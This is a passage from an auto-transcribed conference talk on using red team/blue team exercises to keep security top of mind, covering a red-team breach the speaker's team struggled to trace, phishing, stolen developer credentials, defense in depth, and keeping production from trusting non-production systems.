handle it particularly well it was it was valuable for us to get better at it the other thing that's happened you know I mentioned the azure red team doing stuff to us and us catching them they they have also done things to us that we haven't caught and I will tell you you know again I've been this whole presentation is about how to change conversation around security I got a bit of kind of my own that dose of my own medicine I was on the other end of it where I knew they had breached the system I didn't know what they had done because we hadn't we hadn't been able to properly trace them through the system and it's not my people right because when it's my people I can go find out kind of what's going on if I'm curious right and I'm like this feels very different the the there's a certain level of helplessness that you feel when when that you know somebody's in the system and you you're not yet able to go take care of it now over a course of a few hours we figured out what they were doing we figured out how to deal with it etc but that initial feeling is super unsettling lessons learned so red blue my whole purpose here in this talk is is how to change the conversation to get away from the dry security conversations where it's either people pushing back because it's never happened or worst case is security is actually security theater where you have requirements to go do stuff and everybody kind of nods their heads and they check the boxes but they don't really do the real work so I use red blue to really change that conversation to keep security top of mind for people every time somebody says I don't want to show up in the red team event it's just it's just awesome that's that's a measure of success phishing is very very effective as an attack mechanism so you have to think about how do you protect against that two of a challenges are really the best approach there you also saw from the results I showed you of trying our own team a couple of years ago and we've done other since and thankfully response rates have gotten much better but it'll never be perfect every time you add somebody new to the team it's another opportunity for somebody to get fished or not to be on guard the engineering system is important engineering systems are always important but they're important for security because if I can get into the engineering system I can get into your service and this is a hard one to defend against because if I steal a developer's credentials just like the conversation she and I were having right if I can get her credentials and she's a developer on my team how can I tell the difference so I can't say I've got full solutions for everything there but you know when you go back and you look at kind of how some of these things have progressed being able to thwart Mimi Katz being able to avoid having test credentials misappropriated trying to stop these things at the front door they help and the other side is detection and like I say some of that is still the work in progress and defense in depth you know it's going to happen they're going to get in you're best off assuming that everything you have can be and will be attacked and so a service might be behind the scenes it might not be publicly facing there might not be a single public entry point to something that's running behind the scenes but if it has access to anything if it's at all interesting once an attacker's in they will go after it because internal systems tend to be much softer targets and very valuable so every time you put a boundary in place every time you make it harder it does two things one it slows them down and two it gives you the opportunity to catch them because the more stuff they have to do to traverse the graph the more opportunities you have to detect what they're doing and the last thing is as we talked about this couple of times is don't ever cross trust realms don't allow production to trust anything else that's not production it it's subtle but it's a great way to get in and on that note thank you very much appreciate it